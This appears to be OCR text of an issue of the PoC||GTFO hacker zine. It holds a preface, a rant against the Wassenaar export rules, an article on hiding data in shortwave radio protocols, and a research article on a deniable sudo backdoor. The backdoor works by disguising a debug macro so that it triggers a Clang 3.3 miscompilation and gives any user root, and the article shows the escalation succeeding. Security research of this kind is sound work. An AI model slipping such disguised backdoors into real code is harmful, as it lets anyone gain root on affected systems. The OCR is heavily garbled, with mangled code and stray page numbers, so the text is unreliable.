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1 Please stand; now, please be seated. 



Neighbors, please join me in reading this ninth 
release of the International Journal of Proof of Con- 
cept or Get the Fuck Out, a friendly little collection 
of articles for ladies and gentlemen of distinguished 
ability and taste in the field of software exploita- 
tion and the worship of weird machines. If you are 
missing the first eight issues, we the editors suggest 
pirating them from the usual locations, or on pa- 
per from a neighbor who picked up a copy of the 
first in Vegas, the second in Sao Paulo, the third 
in Hamburg, the fourth in Heidelberg, the fifth in 
Montreal, the sixth in Las Vegas, the seventh from 
his parents' inkjet printer during the Thanksgiving 
holiday, or the eighth in Heidelberg. This is our sec- 
ond epistle to Montreal, because we love that city 
and its fine neighbors. 

Page 4 contains our own Pastor Manul 
Laphroaig's rant on the recent Wassenaar amend- 
ments, which will have us all burned as witches. 

On page 7, Scott Bauer, Pascal Cuoq, and John 
Regehr present a backdoored version of sudo, but 
why should we give a damn whether anyone can 
backdoor such an application? Well, these fine 
neighbors abuse a pre-existing bug in CLANG that 
snuck past seventeen thousand assertions. Thus, the 
backdoor in their version of sudo provably doesn't 
exist until after compilation with a particular com- 
piler. Ain't that clever? 

On page 10, Travis Goodspeed and his neigh- 
bor Muur present fancy variants of digital short- 
wave radio protocols. They hide text in the null 
bits between PSK31 letters and in the space between 
RTTY bytes. Just for fun, they also transmit Morse 
code from 100 Mbit Ethernet to a nearby shortwave 
receiver! 

It's common practice in some IT departments 
to use a Mouse Jiggler, such as the Weibetech MJ- 
3, to keep a Screensaver from password protecting 
a seized computer while waiting for a forensic an- 
alyst. Mickey Shkatov took one of these doodads 
apart, and on page 20 he shows how to reprogram 
one. 

On page 24, DJ Capelis and Daniel Bittman 
present a hypervisor exploit that was unwanted by 
the academic publishers. As our Right Reverend has 
better taste than the Unseen Academics, we happily 
scooped up their neighborly submission for you, our 
dear reader. 



Saumil Shah says that a good exploit is one that 
is delivered in style, and Bukowski says that style is 
the answer to everything, a fresh way to approach 
a dull or dangerous thing. On page 27, Saumil 
presents us with tricks for encoding browser exploits 
as image files. Saumil has style. 

Back in the days of Visual Basic 6, there was a 
directive, on error resume next, that instructed 
the interpreter to ignore any errors. Syntax error? 
Divide by zero? Wrong number of parameters? No 
problem, the program would keep running, the in- 
terpreter doing its very best to do something with 
the hideous mess of spaghetti code that VB pro- 
grammers are famous for. On page 45, Jeffball from 
DC949 commits the criminal act of porting this be- 
havior to C on Linux. 

On page 47, Tommy Brixton sings a heartbreak- 
ing classic, Unbrick My Part! 

On page 48, JP Aumasson talks about those 
fancy little NUMS— Nothing Up My Sleeve- 
numbers. He keeps a lot of them up his sleeves. 

On page 55, Russell Handorf teaches us how to 
build a Wireless CTF on the cheap, broadcasting a 
number of different protocols through Direct Digital 
Synthesis on a Raspberry Pi. 

On page 60, Philippe Teuwen explains how he 
made this PDF into a polyglot able to secure your 
communications by encrypting plain English into— 
wait for it— plain English! Still better, all cipher text 
is grammatical English! 

On page 64, the last and most important 
page, we pass around the collection plate. Pastor 
Laphroaig doesn't need a touring jumbo jet like 
those television and radio preachers; rather, this 
humble worshiper of the weird machines just needs 
an arms-export license in order to keep his church 
newsletter legal under the the Wassenaar Arrange- 
ment on Export Controls for Conventional Arms and 
Dual-Use Goods and Technologies. From those of 
you who are not Lords of War, we also gladly ac- 
cept alms of PoC. 
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2 Witches, Warlocks, and Wassenaar; or, 

On the Internet, no one knows you are a witch. 



Gather round, neighbors! 

Neighbors, I said, but perhaps I should have 
called you fellow witches, warlocks, arms dealers, 
and other purveyors of heretic computation. For our 
pursuits have been weighed, measured, and found 
wanting for whatever it is these days that still allows 
people of skill to pursue that skill without manda- 
tory oversight. Now our carefree days of bewitching 
our neighbors' cattle and dairy products are draw- 
ing to a close; our very conversation is a weapon 
and must, for our own good, be exercised under the 
responsible control of our moral betters. 

And what is our witchcraft, the skill so dire that 
these said betters have girt themselves to "regulate 
your shady industry out of existence"? Why, it's ap- 
parently our mystical and ominous ability to write 
programs that create "modification of the standard 
execution path of a program or process in order to 



allow the execution of externally provided instruc- 
tions". We speak secret and terrible words, and 
these make our neighbors' softwares suddenly and 
unexpectedly lose their virtue. The evil we con- 
jure congeals out of the thin air; never mind the 
neglect and the feeble excuses that whatever causes 
the plague will not be burned with the witch. 

Come to think of it, rarely a suspected witch or 
a warlock have had the case against them laid out in 
such a crisp definition. Indeed, the days of spectral 
evidence are over and done; now the accused can 
be confronted with an execution trace! The judg- 
ment may pass you over if you claim the sanctuary of 
your craft being limited to Hypervisors, Debuggers, 
Reverse Engineering Tools, or— surprise, surprise!— 
DRM; for these are what a good wizard is allowed 
to exercise. However, dare to deviate into "propri- 
etary research on the vulnerabilities and exploitation 
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of computers and network- capable devices", and your 
goose is cooked, and so are your "items that have or 
support rootkit or zero-day exploit capabilities." 1 

Heretics as we are, we turn our baleful and en- 
vious eye towards the hallowed halls of science. Be- 
hold, here are a people under a curious spell: they 
must talk of things that are not yet known to their 
multitudes— that which we call "zero-day"— or they 
will not be listened to by their peers. Indeed, what 
we call "zero-day" they call a "discovery," or simply 
a "publication." It's weird how advancement among 
them is meant to be predicated on the number of 
these "zero-day" results they can discover and pub- 
lish; and they are free to pursue this discovery for 
either public and private ends after a few distin- 
guished "zero-days" are published and noted. 

What a happy, idyllic picture! It might or 
might not have been helped by the fact that those 
sovereigns who went after the weird people in robes 
tended to be surprised by other sovereigns who had 
the fancy to leave them alone and to occasionally 
listen to their babbling. But, neighbors, this lesson 
took centuries, and anyway, do we have any god- 
damn robes? No, we only have those stupid bal- 
aklavas we put on when we sit down to our kind of 
computing, and that doesn't really count. 

Ah, but can't we adopt robes too, or at least just 
publish everything we do right away 2 , to seek the 
protection of the "publish or perish" magic that has 
been working so well for the people who use the same 
computers we do but pay to present their papers at 
their conferences? Well, so long as we are able to 
ditch our proprietary tools and switch to those that 
mysteriously stop compiling after their leading au- 
thor has graduated— and what could go wrong? Af- 
ter all, it's mere engineering detail that the private 
startups and independent researchers ever provide 
to a scientific discipline, and they could surely do it 
on graduate student salaries instead! 

But, a reasonable voice would remind us, not all 



is lost. Our basic witchcraft is safe, for the devilish 
"intrusion software", our literal spells and covenants 
with the Devil, is not in fact to be controlled! We 
are free to exchange those so long as we mean to do 
good works with them and eventually share them 
with our betters or the public. It's only the means 
of "generating" the new spells that must be watched; 
it's only methods to "develop" the new knowledge 
that you will get in trouble for. Indeed, our pre- 
cious weird programs are safe, it's only the programs 
to write these programs that will put you under the 
witches' hammer of scrutiny. We have been saved, 
neighbors— or have we? 

I don't know, neighbors. Among the patron 
saints of our craft we distinguish the one who in- 
vented programs that write programs, and, inciden- 
tally, filed the first bug (if somewhat squashed in the 
process), and the one whose Turing award speech 
was about exploiting such programs— so important 
and invisible in our trust they have become, so fast. 
We spend hours to automate tasks that would take 
minutes; we grow by making what was an arcane 
art of the few accessible to many, through tools that 
make the unseen observable and then transparent. 

Of all the tool-making species, we might be the 
most devoted to our tools, tolerating no obscurity 
and abhorring impenetrable abstraction layers left 
so "for our own benefit." And yet it is this toolmak- 
ing spirit that we must surrender to scrutiny and a 
regime of prior permission— or else. 

Is it merely a coincidence that the inventor of the 
compiler is also credited with "It is much easier to 
apologize than it is to get permission"? Apparently, 
there were the times when this method worked; we'll 
have to see if it sways the would-be inquisitors into 
our craft of heretical computations. 

Thank you kindly, 
— PML 



^ttps : //www. federalregister.gov/articles/2015/05/20/2015-11642/wassenaar-arrangement-2013-plenary-agreements- 
implementat ion- intrusion- and- surveillance- items 

2 Affording the time for proper peer review, of course, that is, the time for the random selection of peers to catch up with 
what one is doing. But what's a year or two on the grand Internet scale of things, eh? 
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3 Deniable Backdoors Using Compiler Bugs 



by Scott Bauer, Pascal Cuoq, and John Regehr 



Do compiler bugs cause computer software to be- 
come insecure? We don't believe this happens very 
often in the wild because (1) most code is not mis- 
compiled and (2) most code is not security-critical. 
In this article we address a different situation: we'll 
play an adversary who takes advantage of a natu- 
rally occurring compiler bug. 

Do production-quality compilers have bugs? 
They sure do. Compilers are constantly evolving 
to improve support for new language standards, new 
platforms, and new optimizations; the resulting code 
churn guarantees the presence of numerous bugs. 
GCC currently has about 3,200 open bugs of priority 
PI, P2, or P3. (But keep in mind that many of these 
aren't going to cause a miscompilation.) The invari- 
ants governing compiler-internal data structures are 
some of the most complex that we know of. They are 
aggressively guarded by assertions, roughly 11,000 
in GCC and 17,000 in LLVM. Even so, problems 
slip through. 

How should we go about finding a compiler bug 
to exploit? One way would be to cruise an open 
source compiler's bug database. A sneakier alterna- 
tive is to find new bugs using a fuzzer. A few years 
ago, we spent a lot of time fuzzing GCC and LLVM, 
but we reported those bugs— hundreds of them!— 
instead of saving them for backdoors. These compil- 
ers are now highly resistant to Csmith (our fuzzer), 
but one of the fun things about fuzzing is that ev- 

3 http : //permalink . gmane . org/ gmane . comp . compilers . 11 



ery new tool tends to find different bugs. This has 
been demonstrated recently by running afl-fuzz 
against Clang/ LLVM. 3 A final way to get good com- 
piler bugs is to introduce them ourselves by submit- 
ting bad patches. As that results in a "Trusting 
Trust" situation where almost anything is possible, 
we won't consider it further. 

So let's build a backdoor! The best way to do 
this is in two stages, first identifying a suitable bug 
in the compiler for the target system, then we'll in- 
troduce a patch for the target software, causing it 
to trip over the compiler bug. 

The sneaky thing here is that at the source code 
level, the patch we submit will not cause a secu- 
rity problem. This has two advantages. First, obvi- 
ously, no amount of inspection— nor even full formal 
verification— of the source code will find the prob- 
lem. Second, the bug can be targeted fairly specifi- 
cally if our target audience is known to use a partic- 
ular compiler version, compiler backend, or compiler 
flags. It is impossible, even in theory, for someone 
who doesn't have the target compiler to discover our 
backdoor. 

Let's work an example. We'll be adding a privi- 
lege escalation bug to sudo version 1.8.13. The tar- 
get audience for this backdoor will be people whose 
system compiler is Clang/LLVM 3.3, released in 
June 2013. The bug that we're going to use was 
discovered by fuzzing, though not by us. The fol- 

devel/79491 
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lowing is the test case submitted with this bug. 4 



220 



int x = 1 ; 

int main(void) { 

if (5 % (3 * x) + 2 ! = 

builtin_abort () ; 

return 0; 

} 



4) 



222 



user_match = userlist _ matches ( sudo_user . pw, 

&us— >users ) ; 
debug_continue ( ( user_match != ALLOW), 
DEBUGNOTICE, 

"No user match, continuing to 
search\n") ; 



According to the C language standard, this pro- 
gram should exit normally, but with the right com- 
piler version, it doesn't! 



220 



The debug_ continue macro isn't quite as out- 
of-place as it seems at first glance. Nearby we can 
find this code for printing a debugging message and 
returning an integer value from the current function. 



$ clang —v 




clang version 3.3 (tags /RELEASE_ 


_33/final ) 


Target : x86 64— unknown— linux 


-gnu 


Thread model: posix 




$ clang — O bug . c 




$ . / a . out 




Aborted 





112 
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Is this a good bug for an adversary to use as 
the basis for a backdoor? On the plus side, it ex- 116 
ecutes early in the compiler— in the constant fold- 
ing logic— so it can be easily and reliably triggered 
across a range of optimization levels and target plat- 120 
forms. On the unfortunate hand, the test case from 
the bug report really does seem to be minimal. All 
of those operations are necessary to trigger the bug, 
so we'll need to either find a very similar pattern in 
the system being attacked or else make an excuse to 
introduce it. We'll take the second option. 

Our target program is version 1.8.13 of sudo, 5 112 
a UNIX utility for permitting selected users to run 
processes under a different uid, often 0: root's uid. 
When deciding whether to elevate a user's privileges, 
sudo consults a file called sudoers. We'll patch 
sudo so that when it is compiled using Clang/L- 
LVM 3.3, the sudoers file is bypassed and any 

1 

user can become root. If you like, you can follow 
along on Github. 6 First, under the ruse of improv- 110 
ing sudo's debug output, we'll take this code at 
plugins/ sudoers/parse . c : 220. 



if ( userlist _ mat ches ( sudo_user . pw , &us— > 
users) != ALLOW) 
continue ; 



We can trigger the bug by changing this code 
around a little bit. 



debug_return_int ( validated ) ; 



The debug_ continue macro is defined at 
include/sudo_debug.h: 112 to hide our trickery. 



#define debug_continue ( condit ion , dbg_lvl , \ 

str ,...){ \ 

if (NORMAT TZF/ DEBUG LEVEL ( dbg_lvl ) \ 

&& ( condition ) ) { \ 

sudo_debug_printf (SUDO_DEBUG_NOnCE, \ 

str , ##__VA_ARGS__) ; \ 

continue ; \ 

} \ 

} 



This further bounces to another 


preprocessor 


macro. 




#define NORMALIZE DEBUG LEVEL( dbg 


;_lvl) \ 


(DEBUG TO VERBOSITY (dbg lvl) 


\ 


= SUDO DEBUG NOTICE) 





And that macro is the one that triggers our bug. 
(The comment about the perfect hash function is 
the purest nonsense, of course.) 



/* Perfect hash function for mapping debug 

levels to intended verbosity */ 
#define DEBUG_TO_VERBOSITY(d) * \ 
(5 % (3 * (d)) + 2) 



Would our patch pass a code review? We hope 
not. But a patient campaign of such patches, spread 
out over time and across many different projects, 
would surely succeed sometimes. 

Next let's test the backdoor. The patched sudo 
builds without warnings, passes all of its tests, and 



4 Bug 15940 from the LLVM Project 

5 unzip pocorgtfo08.zip sudo-1 . 8 . 13 -compromise . tar . gz 
6 https : / / github . com/ regehr/sudo- 1 . 8 . 13/compare/ compromise 
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installs cleanly. Now we'll login as a user who is defi- 
nitely not in the sudoers file and see what happens: 



$ whoami 
mark 

$ ~regehr /bad— sudo/ bin / sudo bash 
Password : 

# 



Success! As a sanity check, we should rebuild 
sudo using a later version of Clang/LLVM or any 
version of GCC and see what happens. Thus we 
have accomplished the goal of installing a backdoor 
that targets the users of just one compiler. 



$ ~regehr /bad— sudo/ bin / sudo bash 
Password : 

mark is not in the sudoers file . 
This incident will be reported . 



We need to emphasize that this compromise is 
fundamentally different from the famous 2003 Linux 
backdoor attempt, 7 and it is also different from se- 
curity bugs introduced via undefined behaviors. 8 In 
both of those cases, the bug was found in the code 
being compiled, not in the compiler. 

The design of a source-level backdoor involves 
trade-offs between deniability and unremarkability 
at the source level on the one hand, and the speci- 
ficity of the effects on the other. Our sudo backdoor 
represents an extreme choice on this spectrum; the 
implementation is idiosyncratic but irreproachable. 
A source code audit might point out that the patch 
is needlessly complicated, but no amount of testing 
(as long as the sudo maintainers do not think to use 
our target compiler) will reveal the flaw. In fact, 
we used a formal verification tool to prove that the 
original and modified sudo code are equivalent, the 
details are in our repo. 9 

An ideal backdoor would only accept a specific 
"open sesame" command, but ours lets any non- 
sudoer get root access. It seems difficult to do better 
while keeping the source code changes inconspicu- 
ous, and that makes this example easy to detect 
when sudo is compiled with the targeted compiler. 

If it is not detected during its useful life, a 
backdoor such as ours will fade into oblivion to- 
gether with the targeted compiler. The author of 

7 https : //f reedom- to- tinker . com/blog/f elten/the-linux-backdoor-attempt-of -2003 
8 unzip pocorgtfo08.pdf exploit2.txt 

9 https : //github. com/regehr/sudo-1 . 8. 13/tree/compromise/backdoor-inf o 



the backdoor can maintain their reputation, and 
contribute to other security-sensitive open source 
projects, without even needing to remove it from 
sudo's source code. This means that the author can 
be an occasional contributor, as opposed to having 
to be the main author of the backdoored program. 

How would you defend your system against an 
attack that is based on a compiler bug? This is not 
so easy. You might use a proved- correct compiler, 
such as CompCert C from INRA. If that's too dras- 
tic a step, you might instead use a technique called 
translation validation to prove that— regardless of 
the compiler's overall correctness— it did not make 
a mistake while compiling your particular program. 
Translation validation is still a research- level prob- 
lem. 

In conclusion, are we proposing a simple, low- 
cost attack? Perhaps not. But we believe that it 
represents a depressingly plausible method for in- 
serting hard-to-find and highly deniable backdoors 
into security-critical code. 
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A Protocol for Leibowitz; or, 

Booklegging by HF in the Age of Safe iEther 

by Travis Goodspeed and Muur P. 



Howdy y'all! 

Today we'll discuss overloading of protocols for 
digital radio. These tricks can be used to hide data, 
exfiltrate it, watermark it, and so on. The nifty 
thing about these tricks is that they show how mod- 
ulation and encoding of digital radio work, and how 
receivers for it are built, from really simple proto- 
cols like the amateur radio PSK31 and RTTY to 
complex ones like 802.11, 802.15.4, Bluetooth, etc. 

We'll start with narrow-band protocols that you 
can play with at audio frequencies. So if you don't 
have an amateur license and a shortwave transceiver, 
you can use your sound card to do most of the work 
and run an audio cable between two laptops to send 
and receive it. 10 



message (CQ CQ CQ de MICE MICE Pse k), and 
nothing may draw undue attention to their com- 
munications. Bob, however, is able to find a secret, 
second meaning. 

In this article, we'll introduce you to some of the 
steganographic tricks they could use, as well as some 
less stealthy— and more neighborly— ways to com- 
bine protocols. We'll start with PSK31 and RTTY, 
with a bit of CW for good measure. And just to 
show off, we'll also bring wired Ethernet into the 
mix, for an exfiltration trick worthy of being shared 
around campfires! 13 

4.1 All You Need Is Sines 

Well, not really. But it sure looks that way when 
you read about radio: sines are everywhere, and you 
build your signal out of them, using variations in 
their amplitude, frequency, phase to transmit infor- 
mation. 14 This stands to physical reason, since the 
sine wave is the basic kind of electromagnetic oscilla- 
tion we can send through space. Of course, you can 
add them by putting them on the same wire, and 
multiply them by applying one signal to the base 
of a transistor through which the other one travels; 
you can also feed them through filters that suppress 
all but an interval of frequencies. 

You can see these sines in the signal you re- 
ceive on the waterfall display of Baudline or FLDigi, 
which show the incoming signal in the frequency 
domain by way of the Fourier transform. PSK31 
transmissions, for example, will look like nice nar- 
row bands on the waterfall view, which is the point 
of its design. 

The waterfall view is close to how a mathemati- 
cian would think about signals: all input whatsoever 
is a bunch of sine waves from all across the spec- 
trum, even noise and all. A perfectly clean sine wave 
such as a carrier would make a single bright pixel 

10 You could also use loud speakers, but please don't. Pastor Laphroaig reminds us that there is a special level of hell for such 
people, who will spend Eternity next to those who scratch fingernails on chalk boards. 
1:L unzip pocorgtfo08.pdf ifthisgoeson.txt 

12 Which some haters call Fundamentalist instead of Fair, but that's unsafe speech. Unsafe speech has consequences, neighbors. 
You don't want to find out about the consequences, so stay safe! 
13 Campfires are definitely not safe, so enjoy them while they last! 

14 Some combinations are useful, such as amplitude and phase, used, e.g., in DOCSIS; others aren't so useful, such as phase 
and frequency, because changes in one can't always be told from changes in the other. 



Suppose that sometime in the future, our neigh- 
bor Alice lives in an America of modern-day Ne- 
hemiah Scudder, 11 whose Youtube preachers and 
Twitter lynch mobs have made the Internet into a 
Safe Zone for America's Youth, by disconnecting it 
from anything unsafe. So Alice's only option to get 
something unsafe to read is from Booklegger Bob in 
Canada, by shortwave radio. 

But it ain't so easy. President Scudder has di- 
rected Eve at the Fair Communications Commis- 
sion 12 to strictly monitor and brutally enforce radio 
regulations, defending the principles of Shortwave 
Neutrality and protecting the youth from microun- 
safeties. 

So Alice and Bob need to make a shortwave ra- 
dio polyglot, valid in more than one format. In- 
tent on her mission, Eve is listening. So when Al- 
ice and Bob's transmissions are sniffed by Scudder's 
National Safety Agency or overheard by the gen- 
eral public, they must appear to be a popular ap- 
proved plaintext protocol. It must appear the same 
on a spectrum waterfall, must decode to a valid 
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in every line, a single bright 1-pixel stripe scrolling 
down. That line would expand to a multi-pixel band 
for a signal that is the carrier being modulated by 
changing its amplitude, frequency, or phase in any 
way, with the width of the band being the double 
of the highest frequency at which the changes are 
applied. 15 

Of course, the actual construction of digital radio 
receivers has very little to do with this mathemati- 
cian's view of the signal. While a mix of ideal sines 
would neatly fall apart in a perfect Fourier trans- 
form, the real transform of sampled signal would 
have to be discrete, and would present all the in- 
teresting problems of aliasing, edge effects, leakage, 
scalloping, and so on. Thus the actual receiving 
circuits are specialized for their intended protocols 
particular kinds of modulation, designed to extract 
the intended signal's representation and ignore the 
rest— and therein lies Alice's and Bob's opportunity. 

4.2 Related Work 

In 2014, Paul Drapeau (KAIOVM) and Brent 
Dukes released jt65stego, a patched version of the 
JT65 mode that hides data in the error correcting 
bits. 16 ' 17 The original JT65 by Joe Taylor (K1JT) 
features frames of 72 bits augmented by 306 error- 
correcting bits, 18 so Drapeau and Dukes were able 
to hide encrypted messages by flipping bits that nor- 
mal radios will flip back. This reduces the odds of 
successfully decoding the cover message, but they 
do correct for some errors of the ciphertext. 

Our concern in this article is not really stego, 
though that will be covered. Instead, we'll be look- 
ing at which protocols can be combined, embedded, 
emulated, and smuggled through other protocols. 
We'll play around with all sorts of crazy combi- 
nations, not because these combinations themselves 
are a secure means of communication, but because 



we'll be better at designing new means of communi- 
cation for having thought about them. 

4.3 Classic PSK31 

PSK31 is best described in an article by Peter Mar- 
tinez, G3PLX. 19 Here, we'll present a slightly sim- 
plified version, ignoring the QPSK extension and 
parts of the symbol set, so be sure to have a copy 
of Peter's article when implementing any of these 
techniques yourself. 

This is a Binary Phase Shift Keyed protocol, 
with 31.25 symbols sent each second. It consumes 
just a bit more than 60 Hz, allowing for many PSK31 
conversations to fit in the bandwidth of a single voice 
channel. 

The PSK31 signal is commonly generated as au- 
dio then sent with Upper SideBand (USB) modu- 
lation, in which the audio frequency (1 kHz) is up- 
shifted by an RF frequency (28.12 MHz) for trans- 
mission. For reception, the same thing happens in 
reverse, with a USB shortwave receiver downshifting 
the radio frequencies to the audio range. In older 
radios, this is performed by an audio cable. More 
modern radios, such as the Kenwood TS-590, im- 
plement a USB Audio Class device that can be run 
digitally to a nearby computer. 

Because many different PSK31 transmissions can 
fit within the bandwidth of a single voice channel, 
modern PSK31 decoders such as FLDigi are capable 
of decoding multiple conversations at once, allowing 
an operator to monitor them in parallel. These par- 
allel decodings are then contributed to aggregation 
websites such as PSKReporter that collect and map 
observations from many different receivers. 

4.3.1 Varicode 

Instead of ASCII, PSK31 uses a variable-length 
character encoding scheme called Varicode. This 



15 This is easy to see for frequency and phase, since these changes are added to the argument of the sine A • sin(ou • t + 9), 
the frequency uo and the phase 0. Seeing this for the amplitude A is a bit trickier, but imagine A to be another sine wave, 
modulating the carrier. Then we deal with the product of two sines, and this is, by the age-old trigonometric identities 
sin(a + /3) = sin(a)cos((3) + cos(a)sin((3) and sin(a — (3) = sin(a)cos((3) — cos{a)sin{(3)\ hence adding these and remembering 
that the cosine is the sine shifted by 7r/2, sin(a)sin((3 + tt/2) = ^(sin(a + (3) + sin(a — (3)). That is, a product of sines is the 
arithmetic average of the sines of the sum and the difference of their arguments. If a is the carrier and (3 is the change, the 
rainfall diagram will show the band from a — (3 to a + (3, that is 2/3-wide. 

Seeing this sum and knowing the carrier frequency, one might wonder: can't we make do with just one term of the sum a + /3, 
and ignore a — (31 Indeed, if one applies a filter to cut the frequencies less than the carrier from the transmitted signal, one can 
save half the bandwidth and still recover the signal (3. This trick is known as the Upper Side Band, and it used for the actual 
digital radio transmissions. 

16 https : / / github . com/ pdogg/ j t65stego 

17 Steganography in Commonly Used HF Protocols, Drapeau and Dukes, Defcon 22 
18 unzip pocorgtfo08.pdf jt65.pdf 
19 unzip pocorgtfo08.pdf psk31.pdf 
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character set features many of the familiar ASCII 
characters, but they are rearranged so that the most 
common characters require the fewest bits. For ex- 
ample, the letter e is encoded as 11, using two bits 
instead of the eight (or seven) that it would consume 
in ASCII. Lowercase letters are generally shorter 
than upper case letters, with uncommon control 
characters taking the most bits. 

A partial Varicode alphabet is shown in Figure 2. 
Additionally, an idle of at least two 0 bits is required 
between Varicode characters. No character begins or 
ends with a 0, and for clock recovery reasons, there 
will never be a string of more than six 1 bits in a 
row. 



4.3.2 Encoding 

To encode a message, letters are converted to bits 
through the Varicode table, delimited by 00 to keep 
them distinct. As PSK31 is designed for live use by 
a human operator in real time, any number of zeroes 
may be appended. That is, "e e" can be rendered 
to 110010011, 110000010011, or 1100100011; there 
is no difference in meaning, only transmission time. 

PSK31 encodes the bit 1 as a continuous carrier 
and the bit 0 as a carrier phase reversal. So the 
sequence 11111111 is a boring old carrier wave, no 
different from holding a Morse key for a quarter- 
second, while 00000000 is a carrier that inverts its 
phase every 31.25 ms. 



So what's a phase reversal? It just means that 
what used be the peak of the wave is now a trough, 
and what used to be the trough is now a peak. 



4.3.3 Decoding 

As described in Martinez' PSK31 article, a receiver 
first uses a narrow bandpass filter to select just one 
PSK31 signal. 

It then multiplies that signal with a time-delayed 
version of itself to extract the bits. The output will 
be negative when the signal reverses polarity, and 
positive when it does not. 

Once the bits are in hand, the receiver splits 
them into Varicode characters. A character begins 
as the first 1 after at least two zeroes, and a char- 
acter ends as the last 1 before two or more zeroes. 
After the characters are split apart, they are parsed 
by a lookup table to produce ASCII. 



4.4 PSK31 Stego 

4.4.1 Extending the Varicode Character Set 

G3PLX's original article contains a second part, in 
which he notes that his original protocol provides no 
support for extended characters, such as the British 
symbol for pounds sterling, £. Wishing to add such 
characters, but not to break compatibility, he noted 
that the longest legal Varicode character was ten 
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Figure 1: PSKReporter, a Service for Monitoring PSK31 



bits long. Anything longer was ignored by the re- 
ceiver as a damaged and unrecoverable character, so 
PSK31 uses those long sequences for extended char- 
acters. 

Reviewing the source code of a few PSK31 de- 
coders, we find that Varicode still has not defined 
anything with more than twelve bits. By prefix- 
ing the character Alice truly intends to send with 
a pattern such as 101101011011, she can hide spe- 
cial characters within her message. To decode the 
hidden message, Bob will simply cut that sequence 
from any abnormally long character. 

4.4.2 Hiding in Idle Lengths 

PSK31 requires at least two 0 bits between char- 
acters, but it doesn't specify an exact limit. It's 



not terribly uncommon to see forgotten transmitters 
spewing limitless streams of zeroes into the ether as 
their operators sit idle, never typing a character that 
would result in a zero. Alice can abuse this to hide 
extra information by encoding data in the variable 
gap between characters. 

For an example, Alice might place the minimal 
pair of zero bits (00) between characters to indicate 
a zero while a triplet (000) indicates a one. 

4.4.3 Extending the Symbol Set 

In its classic incarnation, PSK31 uses Binary Phase 
Shift Keying (BPSK), which means that the phase 
flips 180 degrees. This is sometimes called BPSK31, 
to distinguish it from a later variant, QPSK31, 
which uses Quadrature Phase Shift Keying (QPSK). 
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20 / 23 August 2015 --> 
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Figure 2: Partial PSK31 Varicode Alphabet 
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QPSK performs phase changes in multiples of 90 de- 
grees, providing G3PLX extra symbol space to per- 
form error correction. 

Alice can use the same trick to form a polyglot 
with BPSK31, but this presents a number of signal 
processing challenges. Simply using the 90-degree 
shifts of QPSK31 would be a bit of an indiscretion, 
as BPSK interpreters would have wildly varying in- 
terpretations of the message, often decoding the hid- 
den bits to visible junk characters. 

Using a terribly small shift is a tempting idea, 
as Alice's use of balanced 170 and 190 degree transi- 
tions might be rounded out to 180 degrees by the re- 
ceiver. Unfortunately, this would require extremely 
stable and well tuned radio equipment, giving Bob 
as much trouble receiving the signal as Eve is sup- 
posed to have! 

Instead of adding additional phases to BPSK31, 
we propose instead that the error correction of 
QPSK31 be abused to encode additional bits. Alice 
can encode data by intentionally inserting errors in 
a QPSK31 bitstream, relying upon Eve's receiver to 
remove them by error correction. Bob's receiver, by 
contrast, would know that the error bits are where 
the data really is. 

4.5 Classic RTTY (ITA2) 

RTTY— pronounced "Ritty"— is a radio extension of 
military teletypewriters that has been in use since 
the early thirties. It consists of five-bit letters, us- 
ing shifts to implement uppercase letters and foreign 
alphabets. Although implementation details vary, 
most amateur stations use 45 baud, 170Hz shift, 
1 start bit, 2 stop bits, and 5 character bits. The 
higher frequency is a mark (one), while the lower 
frequency is a space (zero). 

As more digital protocols other than CW and 
RTTY weren't legalized until the eighties, all sorts 



of clever tricks were thought up. Figure 4 shows 
RTTY artwork from W2PSU's article in the Septem- 
ber 1977 issue of 73 Magazine. Lacking computer- 
ized storage and cheap audio cassettes, it was the 
style at the time to store long stretches of paper 
tape as rolls in pie tins, with taped labels on the 
sides. 

Figure 6 describes Western Union's ITA2 alpha- 
bet used by RTTY, which is often— if imprecisely- 
called Baudot Code. In that figure, 1 indicates 
a high-frequency mark while 2 indicates a low- 
frequency space. Note that these letters are sent 
almost like a UART, least-significant-bit first with 
one start bit and two stop bits. 

4.6 Some Ditties in RTTY 
4.6.1 Differing Diddles 

Unlike a traditional UART, RTTY sends an idle 
character— colloquially known as a Diddle— of five 
marks when no data is available. This is done to 
prevent the receiver from becoming desynchronized, 
but it isn't strictly mandatory. By not sending the 
diddle character (11 111) when idle, the mark bit's 
frequency can be left idle for a bit, encoding extra 
information. 

Additionally, there are not one but two possi- 
ble diddle characters! Traditionally the idle is filled 
with 11111, which means Shift to Letters, so the 
transmitter is just repeatedly telling the receiver 
that the next character will be a letter. You could 
also send 11011, which means Shift to Figures. 
Sending it repeatedly also has no effect, and jumping 
between these two diddle characters will give you a 
side-channel for communication which won't appear 
in normal RTTY receivers. As an added benefit, it 
is visually less conspicuous than causing the right 
channel of your RTTY broadcast to briefly disap- 
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Figure 4: RTTY Art of Seattle Slew from the mid 1970's 
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Figure 6: RTTY's ITA2 Alphabet 



pear! 

4.6.2 Stop with the Stop Bits! 

RTTY is described in the old UART tradition as 
5/N/2, meaning that it has 5 data bits, No parity 
bits, and 2 stop bits. There's a cool trick to UARTs 
that's worth remembering: the transmitter can al- 
ways have more stop bits than the receiver demands, 
and the receiver can always demand fewer stop bits 
than the transmitter sends. 

4.7 Toe Tappin' CW 

Carrier Wave (CW) modulation— better known as 
Morse code— was the first widely deployed digital 
mode to replace spark-gap transmitters. Designed 
for a human operator to manually use, CW is a per- 
fect choice for easy polyglots. 

As a quick review, CW consists of dots and 
dashes. A dash is three times as long as a dot. The 
off-time between elements of a letter is as long as a 
dot, and the off-time between letters in a word is as 
long as a dash. The off- time between words is seven 
times as long as a dot, or a bit more than twice as 
long as a dash. 

4.7.1 QRSS 

While other protocols have standard data rates, 
Morse relies on the recipient to adjust to the rate 
of the transmitter. Operators often find themselves 



unable to keep up with an expert or impatiently 
waiting on a station that transmits slowly, so short- 
hand was developed to ask the other side to change 
rate. QRQ requests that the other side transmit more 
quickly, and QRS requests that the other side slow 
down. 



QRSS is a variant of CW in which the message 
is sent very, very slowly. Rather than a dot last- 
ing a fraction of a second, it might last as long as 
a minute! A receiver can then take a recording of a 
very weak signal, slow down the recording, and vi- 
sually observe the signal to determine its meaning. 



While protocols such as RTTY and PSK31 don't 
take kindly to the sorts of frequent interruptions 
that normal CW would impart, these protocols 
can easily produce QRSS transmissions that are 
legible by slowing down recordings. For exam- 
ple, Alice might send "A1B0B A1B0B de MICE" for 
a dot and "A1B0B A1B0B de MICE. A1B0B A1B0B 
de MICE. A1B0B A1B0B de A 1 ICE ." for a dash. 



This is of course a bit easy to recognize from a 
waterfall, but it might be a fun way to meet your 
neighbors! 
